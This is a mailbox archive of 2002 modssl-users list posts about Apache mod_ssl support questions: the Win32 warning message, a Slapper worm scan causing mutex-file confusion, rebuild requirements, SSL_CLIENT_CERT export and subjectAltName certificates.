          (InterMail vM.5.01.04.19 201-253-122-122-119-20020516) with ESMTP
          id <20021001040639.DFXW4997.tomts20-srv.bellnexxia.net@sympatico.ca>
          for ; Tue, 1 Oct 2002 00:06:39 -0400
Message-ID: <3D991F64.6040705@sympatico.ca>
Date: Tue, 01 Oct 2002 00:07:00 -0400
From: hunter 
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.0.0) Gecko/20020530
X-Accept-Language: en-us, en
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: This combination is *NOT* officially supported
References: 
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: hunter 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Ramakrishna Kuppa wrote:
> Chris,
> 
> I am getting the following message in my SSL log:
> 
> [30/Sep/2002 17:57:49 02000] [info]  Server: Apache/1.3.26, Interface: 
> mod_ssl/2.8.10, Library: OpenSSL/0.9.6g
> [30/Sep/2002 17:57:49 02000] [warn]  You are using mod_ssl under Win32. 
> This combination is *NOT* officially supported. Use it at your own risk!
> 
> 
> Anything to be noted/concerned of?
> 

Ramakrishna,

     /*
      * Identification
      */
     if (mc->nInitCount == 1) {
         ssl_log(s, SSL_LOG_INFO, "Server: %s, Interface: %s, Library: %s",
                 SERVER_BASEVERSION,
                 ssl_var_lookup(p, NULL, NULL, NULL, 
"SSL_VERSION_INTERFACE"),
                 ssl_var_lookup(p, NULL, NULL, NULL, 
"SSL_VERSION_LIBRARY"));
#ifdef WIN32
         ssl_log(s, SSL_LOG_WARN, "You are using mod_ssl under Win32. "
                 "This combination is *NOT* officially supported. "
                 "Use it at your own risk!");
#endif
     }

...it is simply a comment - disclaimer - whatever - it is there in any 
case if you are running Windows version.

Chris.


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Oct  1 07:16:06 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id HAA22794; Tue, 1 Oct 2002 07:15:11 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id HAA22735; Tue, 1 Oct 2002 07:14:05 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id 243764CE73E; Tue,  1 Oct 2002 07:14:07 +0200 (CEST)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id 2A34D286B3; Tue,  1 Oct 2002 07:08:00 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from gunny.gunman.org id TAA07574; Mon, 30 Sep 2002 19:38:37 +0200 (MET DST)
Received: (from gunther@localhost)
	by gunny.gunman.org (8.11.2/8.11.2) id g8UHFxd20465
	for modssl-users@modssl.org; Mon, 30 Sep 2002 10:15:59 -0700 (PDT)
Message-ID: <20020930101557.C20257@gunman.org>
Date: Mon, 30 Sep 2002 10:15:57 -0700
From: P a u l Guth 
To: modssl-users@modssl.org
Subject: Re: slapper(?) causing DoS/mutex file disappearing
References: <20020929125402.C18448@gunman.org>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
X-Mailer: Mutt 0.93.1i
In-Reply-To: <20020929125402.C18448@gunman.org>; from P a u l Guth on Sun, Sep 29, 2002 at 12:54:02PM -0700
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: P a u l Guth 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

FYI, I believe I have tracked this problem down to the Mutex file
being deleted during routine maintenance.  Since recreating the Mutex
file (via restart) I haven't seen the problem recur, and there have
been a few hits from the worm.

Sorry for the alarm.  Nothing to see here.

On Sun, Sep 29, 2002 at 12:54:02PM -0700, P a u l Guth wrote:
> Starting last Thursday, we started to see one of our webservers
> become unresponsive for about 10 minutes...it seemed to be correlated
> with what appeared to be a slapper/OpenSSL worm attack.  We are
> not vulnerable to the worm but the attack seemed to use up some
> resources (not CPU) that prevented apache from answering more requests.
> Note that it corrects itself after 10 minutes or so without manual
> intervention.
> 
> Here's the ouput of our Server: header.
> Server: Apache/1.3.26 (Unix) mod_ssl/2.8.9 OpenSSL/0.9.6g mod_jk
> 
> The error in the logs is:
> [Thu Sep 26 20:55:18 2002] [error] OpenSSL: error:1406B458:SSL routines:GET_CLIENT_MASTER_KEY:key arg too long
> 
> There also are a lot of errors like this that start at the same time:
> [Thu Sep 26 20:49:36 2002] [error] mod_ssl: Child could not open SSLMutex lockfile /usr/local/apache/logs/ssl_mutex.22003 (System error follows)
> 
> And sure enough the mutex file on that server is gone.  It comes
> back on restart...but what the heck is going on here?  Anyone having
> similar issues?
> 
> This is driving me crazy as this is on our production servers and
> I'm not going to get a wink of sleep tonight unless I figure out
> how to stop it....
> 
> ___________________________________________________________________
> P                     a                     u                     l
>                            g@gunman.org 
> 

-- 
___________________________________________________________________
P                     a                     u                     l
                           g@gunman.org 
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Oct  1 08:44:06 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id IAA24200; Tue, 1 Oct 2002 08:43:11 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from mxbackup.aarboard.ch id IAA24193; Tue, 1 Oct 2002 08:42:43 +0200 (MET DST)
Received: from [127.0.0.1] by mxbackup.relay01.aarboard.ch (NTMail 5.06.0016/NT8408.02.a3c8321a) with ESMTP id nxlubaaa for modssl-users@modssl.org; Tue, 1 Oct 2002 08:42:34 +0200
Received: from mail3.aarboard.ch ([192.168.200.11])
 by relay01.aarboard.ch (NAVGW 2.5.2.12) with SMTP id M2002100108423415965
 for ; Tue, 01 Oct 2002 08:42:34 +0200
Received: from Aarboard-MTA by mail3.aarboard.ch
	with Novell_GroupWise; Tue, 01 Oct 2002 08:40:57 +0200
Message-Id: 
X-Mailer: Novell GroupWise Internet Agent 6.0.2
Date: Tue, 01 Oct 2002 08:40:34 +0200
From: "Andre Schild" 
To: 
Subject: Antw: Apache.exe generates errors and is closed by Windows.
Mime-Version: 1.0
Content-Type: text/plain; charset=ISO-8859-1
Content-Disposition: inline
Content-Transfer-Encoding: 8bit
X-MIME-Autoconverted: from quoted-printable to 8bit by opensource.ee.ethz.ch id IAA24197
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Andre Schild" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

We too had those problems with Apache 1.3.x, for this reason we did
never put a Win32 Apache with SSL into production.
Since 3 months we now use the 2.0.x releases, and we are very pleased
with them.
Work realy good under Win32 with/without ssl.

André

>>> ramakrishna@intruvert.com 01.10.2002 01:26:51 >>>
I am getting the above error on my Windows platform. The 
environment details are as follows:

OS: Windows 2000
Server: Apache 1.3.26 with OpenSSL 0.9.6d and mod_ssl 2.8.10

The OS pops up a box with the above message and until the user
acknowledges,
the system doesn't respond to any user requests. In a way, the system
"hangs".

Any ideas on how this can be resolved? Alternatively, can the server be
made
to service user requests?

Thanks
Ramakrishna
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Oct  1 09:11:13 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id JAA25274; Tue, 1 Oct 2002 09:10:10 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from ns0a.swx.com id JAA25264; Tue, 1 Oct 2002 09:09:29 +0200 (MET DST)
Received: from gate0a.unix.swx.ch (gate0a [192.168.252.17])
	by ns0a.swx.com (8.12.6/8.12.6) with ESMTP id g9179JcF018439
	for ; Tue, 1 Oct 2002 09:09:19 +0200 (MEST)
Received: from SOMEXEVS001.ex.ordersx.org (localhost [127.0.0.1])
	by gate0a.unix.swx.ch (8.9.3+Sun/8.9.3) with ESMTP id JAA11990
	for ; Tue, 1 Oct 2002 09:09:18 +0200 (MEST)
content-class: urn:content-classes:message
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="----_=_NextPart_001_01C26919.755DB0F3"
X-MimeOLE: Produced By Microsoft Exchange V6.0.6249.0
Subject: RE: Rebuild of Apache REQUIRED to add SSL???
Date: Tue, 1 Oct 2002 09:09:18 +0200
Message-ID: <484A6CA492BE654395D208B1D8D5393972F67B@SOMEXEVS001.ex.ordersx.org>
Thread-Topic: Rebuild of Apache REQUIRED to add SSL???
Thread-Index: AcJo5nA8GQ3RT3InQj284tkCbFBW7wAMc5gQ
From: "Boyle Owen" 
To: 
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Boyle Owen" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

This is a multi-part message in MIME format.

------_=_NextPart_001_01C26919.755DB0F3
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable

In order to add mod_ssl to apache, you must recompile. The reason is =
that the apache core code is equipped with an application programming =
interface (API) which makes it relatively easy for people to write =
third-party modules and integrate them with apache. However, mod_ssl is =
a bit special since it needs to call routines in the OpenSSL library. =
This is not covered by the standard API. So in order to load mod_ssl, =
you need to extend the API to include openssl hooks. This is done during =
the configure stage when building apache with mod_ssl - the mod_ssl =
configure script patches the apache source code to extend the API (hence =
EAPI).
=20
A plain compilation of apache with mod_ssl is not too difficult and =
should go smoothly on Linux - check out the documentation at the mod_ssl =
site or http://www.delouw.ch/linux/Apache-Compile-HOWTO/html/apache.html =
for a user's perspective on it.
=20
PS you'd also get to upgrade to 1.3.26 - your version is a bit =
out-of-date..
=20
 -----Original Message-----
From: Tony Libby [mailto:tlibby@adelphia.net]
Sent: Montag, 30. September 2002 19:59
To: modssl-users@modssl.org
Subject: Rebuild of Apache REQUIRED to add SSL???


I'm looking into adding SSL ability to my Apache server.
=20
Apache version 1.3.22 running on Red Hat Linux 7.2
=20
MUST I REBUILD THE SERVER?
=20
I don't really want to do this as everything is running nicely now.
=20
If I have to rebuild, what is the SAFEST way?
=20
Thanks for your help!
-Tony

------_=_NextPart_001_01C26919.755DB0F3
Content-Type: text/html;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable













In=20
order to add mod_ssl to apache, you must recompile. The reason is that =
the=20
apache core code is equipped with an application programming =
interface=20
(API) which makes it relatively easy for people to write third-party =
modules and=20
integrate them with apache. However, mod_ssl is a bit special since it =
needs to=20
call routines in the OpenSSL library. This is not covered by the =
standard API.=20
So in order to load mod_ssl, you need to extend the API to include =
openssl=20
hooks. This is done during the configure stage when building apache with =
mod_ssl=20
- the mod_ssl configure script patches the apache source code to extend =
the API=20
(hence EAPI).


 



 


PS you'd also get to upgrade to 1.3.26 - your =
version=20
is a bit out-of-date..


 


 -----Original =
Message-----
From:=20
Tony Libby [mailto:tlibby@adelphia.net]
Sent: Montag, 30. =
September=20
2002 19:59
To: modssl-users@modssl.org
Subject: =
Rebuild of=20
Apache REQUIRED to add SSL???




  

  
I’m looking into =
adding SSL=20
  ability to my Apache server.

  
 

  
Apache version 1.3.22 =
running on=20
  Red Hat Linux 7.2

  
 

  
MUST I REBUILD THE=20
  SERVER?

  
 

  
I don’t really =
want to do this as=20
  everything is running nicely now.

  
 

  
If I have to rebuild, =
what is the=20
  SAFEST way?

  
 

  
Thanks for your=20
  help!

  
-Tony


------_=_NextPart_001_01C26919.755DB0F3--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Oct  1 15:25:04 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id PAA03147; Tue, 1 Oct 2002 15:24:10 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for 
	from email.seznam.cz id PAA03142; Tue, 1 Oct 2002 15:23:53 +0200 (MET DST)
Received: (qmail 98983 invoked by uid 0); 1 Oct 2002 13:23:39 -0000
Received: from [195.39.114.10] by email.seznam.cz with HTTP;
	Tue, 01 Oct 2002 15:23:38 +0200 (CEST)
Content-Type: text/plain; charset=ISO-8859-2
Date: Tue, 01 Oct 2002 15:23:38 +0200 (CEST)
From: =?iso-8859-2?Q?Pavel=20Zdenek?= 
Subject: =?iso-8859-2?Q?SSL=5FCLIENT=5FCERT=20env=20var=20empty=3F?=
Mime-Version: 1.0
Message-Id: <21604.44880-5932-8473573-1033478618@seznam.cz>
To: modssl-users@modssl.org
Content-Transfer-Encoding: 8bit
X-MIME-Autoconverted: from quoted-printable to 8bit by opensource.ee.ethz.ch id PAA03144
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: =?iso-8859-2?Q?Pavel=20Zdenek?= 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hello,

short and simple question: is the SSL_CLIENT_CERT environment
variable supposed to have some content? According to the mod_ssl
reference, it should be the raw string of PEM-encoded client
certificate. Everything else SSL_CLIENT_* is set and correct (the
client auth is working ok), except the damn SSL_CLIENT_CERT. Neither
the SSL_SERVER_CERT but i'm not interested in that. The playground is
RedHat 7.2 Linux with mod_ssl 2.8.4 on Apache 1.3.20 combination
which is a default of the distribution. If none of the SSL_CLIENT_*
env vars would be set, i would be hacking around with versions,
apache setup, suspecting RedHat etc. but it basically works and i
have no other problem, except that SSL_CLIENT_CERT is empty :-(

Best regards,

Pavel Z.


______________________________________________________________________
Reklama:
Kam do kina ci divadla? http://kultura.seznam.cz
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Oct  1 15:47:26 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id PAA03480; Tue, 1 Oct 2002 15:46:08 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from marvin-lnx.staff.tdk.net id PAA03476; Tue, 1 Oct 2002 15:45:56 +0200 (MET DST)
Received: by marvin-lnx.staff.tdk.net (Postfix, from userid 500)
	id D2410BD2E; Tue,  1 Oct 2002 15:46:29 +0200 (CEST)
Date: Tue, 1 Oct 2002 15:46:29 +0200
From: Mads Toftum 
To: modssl-users@modssl.org
Subject: Re: SSL_CLIENT_CERT env var empty?
Message-ID: <20021001134629.GA30921@marvin-lnx.staff.tdk.net>
Mail-Followup-To: modssl-users@modssl.org
References: <21604.44880-5932-8473573-1033478618@seznam.cz>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
In-Reply-To: <21604.44880-5932-8473573-1033478618@seznam.cz>
X-Mailer: mutt
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Mads Toftum 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

On Tue, Oct 01, 2002 at 03:23:38PM +0200, Pavel Zdenek wrote:
> Hello,
> 
> short and simple question: is the SSL_CLIENT_CERT environment
> variable supposed to have some content? According to the mod_ssl
> reference, it should be the raw string of PEM-encoded client
> certificate. Everything else SSL_CLIENT_* is set and correct (the
> client auth is working ok), except the damn SSL_CLIENT_CERT. Neither
> the SSL_SERVER_CERT but i'm not interested in that. The playground is
> RedHat 7.2 Linux with mod_ssl 2.8.4 on Apache 1.3.20 combination
> which is a default of the distribution. If none of the SSL_CLIENT_*
> env vars would be set, i would be hacking around with versions,
> apache setup, suspecting RedHat etc. but it basically works and i
> have no other problem, except that SSL_CLIENT_CERT is empty :-(
> 
Make sure that you have the following set in the right context:
SSLOptions +ExportCertData

See also http://www.modssl.org/docs/2.8/ssl_reference.html#ToC21

vh

Mads Toftum
-- 
`Darn it, who spiked my coffee with water?!' - lwall

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Oct  1 17:09:03 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id RAA05295; Tue, 1 Oct 2002 17:08:09 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from blade.devel.redhat.com id RAA05289; Tue, 1 Oct 2002 17:07:28 +0200 (MET DST)
Received: from blade.devel.redhat.com (localhost.localdomain [127.0.0.1])
	by blade.devel.redhat.com (8.12.5/8.12.5) with ESMTP id g91F9ADd011797
	for ; Tue, 1 Oct 2002 11:09:10 -0400
Received: (from nalin@localhost)
	by blade.devel.redhat.com (8.12.5/8.12.5/Submit) id g91F9Arg011795
	for modssl-users@modssl.org; Tue, 1 Oct 2002 11:09:10 -0400
Date: Tue, 1 Oct 2002 11:09:10 -0400
From: Nalin Dahyabhai 
To: modssl-users@modssl.org
Subject: Re: Rebuild of Apache REQUIRED to add SSL???
Message-ID: <20021001150910.GA11718@redhat.com>
References: <002201c268aa$fe790bf0$6601a8c0@monolith>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
In-Reply-To: <002201c268aa$fe790bf0$6601a8c0@monolith>
User-Agent: Mutt/1.4i
X-Random-Fortune: Bushydo -- the way of the shrub. Bonsai!
Organization: Red Hat, Inc.
X-Department: OS Development
X-Disclaimer: I am not a spokesmodel.  Views expressed are my own.
X-Key-ID: 2537B551
X-Key-Fingerprint: 44D4 B47B 392A 7A64 1D72  08E2 236F 3E15 2537 B551
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Nalin Dahyabhai 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

On Mon, Sep 30, 2002 at 01:58:33PM -0400, Tony Libby wrote:
> I'm looking into adding SSL ability to my Apache server.
>  
> Apache version 1.3.22 running on Red Hat Linux 7.2
>  
> MUST I REBUILD THE SERVER?

If you're using the prepackaged version, you don't.  It has already had
the necessary EAPI patches applied.

The shortest route is probably to install the prepackaged mod_ssl (be
sure to install all of the applicable updates), configure it properly,
and restart your server.

HTH,

Nalin
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Oct  1 17:18:04 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id RAA05489; Tue, 1 Oct 2002 17:17:08 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from imo-m09.mx.aol.com id RAA05482; Tue, 1 Oct 2002 17:16:40 +0200 (MET DST)
From: camccuk@netscape.net
Received: from camccuk@netscape.net
	by imo-m09.mx.aol.com (mail_out_v34.13.) id m.ef.58f2d3f (16228)
	 for ; Tue, 1 Oct 2002 11:15:32 -0400 (EDT)
Received: from  netscape.net (mow-m05.webmail.aol.com [64.12.184.133]) by air-in02.mx.aol.com (v89.10) with ESMTP id MAILININ24-1001111532; Tue, 01 Oct 2002 11:15:32 -0400
Date: Tue, 01 Oct 2002 11:15:32 -0400
To: modssl-users@modssl.org
Subject: Re: Is anyone doing this!?! 
Message-ID: <1FCD37B0.4E703FDA.001D8163@netscape.net>
X-Mailer: Atlas Mailer 2.0
Content-Type: text/plain; charset=iso-8859-1
Content-Transfer-Encoding: 8bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: camccuk@netscape.net
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

>3) Configure the SSL server to use a single SSL certificate. Put *all*
>   of the names and addresses of the server into the "subjectAltName"
>   extension field of the certificate.

In several months of working with SSL and its limitations, I have *never* seen this as a solution - presumably this will work like a wildcard certificate?

Does anyone have any experiences of which client/server combinatipons this will work with?

Cheers,
cam


__________________________________________________________________
The NEW Netscape 7.0 browser is now available. Upgrade now! http://channels.netscape.com/ns/browsers/download.jsp 

Get your own FREE, personal Netscape Mail account today at http://webmail.netscape.com/
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Oct  1 17:28:04 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id RAA05664; Tue, 1 Oct 2002 17:27:10 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from persephone.cfrq.net id RAA05659; Tue, 1 Oct 2002 17:26:50 +0200 (MET DST)
Received: from elisabeth.cfrq.net (elisabeth.chk.cfrq.net [199.85.99.82] (may be forged))
	by persephone.cfrq.net (8.12.2/8.12.2) with ESMTP id g91FQgBI025383
	(version=TLSv1/SSLv3 cipher=EDH-RSA-DES-CBC3-SHA bits=168 verify=OK)
	for ; Tue, 1 Oct 2002 11:26:43 -0400
Received: from elisabeth.cfrq.net (localhost [127.0.0.1])
	by elisabeth.cfrq.net (8.12.2/8.12.2) with ESMTP id g91FQcB6008747
	(version=TLSv1/SSLv3 cipher=EDH-RSA-DES-CBC3-SHA bits=168 verify=NO)
	for ; Tue, 1 Oct 2002 11:26:39 -0400
Received: from elisabeth.cfrq.net (chk@localhost)
	by elisabeth.cfrq.net (8.12.2/8.12.2/Submit) with ESMTP id g91FQZoa008743
	for ; Tue, 1 Oct 2002 11:26:37 -0400
X-Authentication-Warning: elisabeth.cfrq.net: chk owned process doing -bs
To: modssl-users@modssl.org
Subject: Re: Is anyone doing this!?! 
References: <1FCD37B0.4E703FDA.001D8163@netscape.net>
In-reply-to: Your message of "Tue, 01 Oct 2002 11:15:32 -0400".
	 <1FCD37B0.4E703FDA.001D8163@netscape.net> 
From: Harald Koch 
Date: Tue, 01 Oct 2002 11:26:34 -0400
Message-ID: <8742.1033485994@elisabeth.cfrq.net>
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Harald Koch 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

> Does anyone have any experiences of which client/server combinatipons this will work with?

I've used subjectAltName with IE 5.0, 5.5, and 6.0; and several recent
Mozilla versions. I vaguely remember it working with earlier Netscape
browsers, but I don't remember which versions.

-- 
Harald Koch     

"It takes a child to raze a village."
		-Michael T. Fry
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Oct  1 20:03:05 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id UAA08830; Tue, 1 Oct 2002 20:02:19 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from ivexgw1.intruvert.com id UAA08814; Tue, 1 Oct 2002 20:01:34 +0200 (MET DST)
Received: by ivexgw.intruvert.com with Internet Mail Service (5.5.2656.59)
	id ; Tue, 1 Oct 2002 11:01:26 -0700
Message-ID: 
From: Ramakrishna Kuppa 
To: "'modssl-users@modssl.org'" 
Subject: RE: This combination is *NOT* officially supported
Date: Tue, 1 Oct 2002 11:01:26 -0700 
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2656.59)
Content-Type: multipart/alternative;
	boundary="----_=_NextPart_001_01C26974.8F5C2A20"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Ramakrishna Kuppa 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

This message is in MIME format. Since your mail reader does not understand
this format, some or all of this message may not be legible.

------_=_NextPart_001_01C26974.8F5C2A20
Content-Type: text/plain

Chris,

Which code is this - is it the Apache OR mod_ssl OR OpenSSL?

And, if I understood you right, irrespective of the versions of the above
software, on Win32 systems, the message is written to the log file. Do you
see this log entry in any of the many installations you have?


> -----Original Message-----
> From: hunter [mailto:theantigod@sympatico.ca] 
> Sent: Monday, September 30, 2002 9:07 PM
> To: modssl-users@modssl.org
> Subject: This combination is *NOT* officially supported
> 
> 
> Ramakrishna Kuppa wrote:
> > Chris,
> > 
> > I am getting the following message in my SSL log:
> > 
> > [30/Sep/2002 17:57:49 02000] [info]  Server: Apache/1.3.26, 
> Interface:
> > mod_ssl/2.8.10, Library: OpenSSL/0.9.6g
> > [30/Sep/2002 17:57:49 02000] [warn]  You are using mod_ssl 
> under Win32. 
> > This combination is *NOT* officially supported. Use it at 
> your own risk!
> > 
> > 
> > Anything to be noted/concerned of?
> > 
> 
> Ramakrishna,
> 
>      /*
>       * Identification
>       */
>      if (mc->nInitCount == 1) {
>          ssl_log(s, SSL_LOG_INFO, "Server: %s, Interface: %s, 
> Library: %s",
>                  SERVER_BASEVERSION,
>                  ssl_var_lookup(p, NULL, NULL, NULL, 
> "SSL_VERSION_INTERFACE"),
>                  ssl_var_lookup(p, NULL, NULL, NULL, 
> "SSL_VERSION_LIBRARY"));
> #ifdef WIN32
>          ssl_log(s, SSL_LOG_WARN, "You are using mod_ssl 
> under Win32. "
>                  "This combination is *NOT* officially supported. "
>                  "Use it at your own risk!");
> #endif
>      }
> 
> ...it is simply a comment - disclaimer - whatever - it is 
> there in any 
> case if you are running Windows version.
> 
> Chris.
> 
> 
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
> 

------_=_NextPart_001_01C26974.8F5C2A20
Content-Type: text/html
Content-Transfer-Encoding: quoted-printable






RE: This combination is *NOT* officially supported




Chris,




Which code is this - is it the Apache OR mod_ssl OR =
OpenSSL?




And, if I understood you right, irrespective of the =
versions of the above software, on Win32 systems, the message is =
written to the log file. Do you see this log entry in any of the many =
installations you have?





> -----Original Message-----

> From: hunter [mailto:theantigod@sympatico.ca] 

> Sent: Monday, September 30, 2002 9:07 PM

> To: modssl-users@modssl.org

> Subject: This combination is *NOT* officially =
supported

> 

> 

> Ramakrishna Kuppa wrote:

> > Chris,

> > 

> > I am getting the following message in my =
SSL log:

> > 

> > [30/Sep/2002 17:57:49 02000] [info]  =
Server: Apache/1.3.26, 

> Interface:

> > mod_ssl/2.8.10, Library: =
OpenSSL/0.9.6g

> > [30/Sep/2002 17:57:49 02000] [warn]  =
You are using mod_ssl 

> under Win32. 

> > This combination is *NOT* officially =
supported. Use it at 

> your own risk!

> > 

> > 

> > Anything to be noted/concerned of?

> > 

> 

> Ramakrishna,

> 

>      /*

>       * =
Identification

>       */

>      if =
(mc->nInitCount =3D=3D 1) {

>          =
ssl_log(s, SSL_LOG_INFO, "Server: %s, Interface: %s, 

> Library: %s",

>          =
;        SERVER_BASEVERSION,

>          =
;        ssl_var_lookup(p, NULL, =
NULL, NULL, 

> "SSL_VERSION_INTERFACE"),

>          =
;        ssl_var_lookup(p, NULL, =
NULL, NULL, 

> "SSL_VERSION_LIBRARY"));

> #ifdef WIN32

>          =
ssl_log(s, SSL_LOG_WARN, "You are using mod_ssl 

> under Win32. "

>          =
;        "This combination is =
*NOT* officially supported. "

>          =
;        "Use it at your own =
risk!");

> #endif

>      }

> 

> ...it is simply a comment - disclaimer - =
whatever - it is 

> there in any 

> case if you are running Windows version.

> 

> Chris.

> 

> 

> =
______________________________________________________________________

> Apache Interface to OpenSSL =
(mod_ssl)          &nb=
sp;        www.modssl.org

> User Support Mailing =
List           &n=
bsp;          =
modssl-users@modssl.org

> Automated List =
Manager           =
;            =
;     majordomo@modssl.org

> 





------_=_NextPart_001_01C26974.8F5C2A20--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Oct  2 03:33:06 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id DAA20759; Wed, 2 Oct 2002 03:32:12 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from tomts7-srv.bellnexxia.net id DAA20755; Wed, 2 Oct 2002 03:31:35 +0200 (MET DST)
Received: from sympatico.ca ([64.231.121.253]) by tomts7-srv.bellnexxia.net
          (InterMail vM.5.01.04.19 201-253-122-122-119-20020516) with ESMTP
          id <20021002013134.RRAA3879.tomts7-srv.bellnexxia.net@sympatico.ca>
          for ; Tue, 1 Oct 2002 21:31:34 -0400
Message-ID: <3D9A4C78.1090305@sympatico.ca>
Date: Tue, 01 Oct 2002 21:31:36 -0400
From: hunter 
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.0.0) Gecko/20020530
X-Accept-Language: en-us, en
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: This combination is *NOT* officially supported
References: 
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: hunter 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Ramakrishna Kuppa wrote:
> Chris,
> 
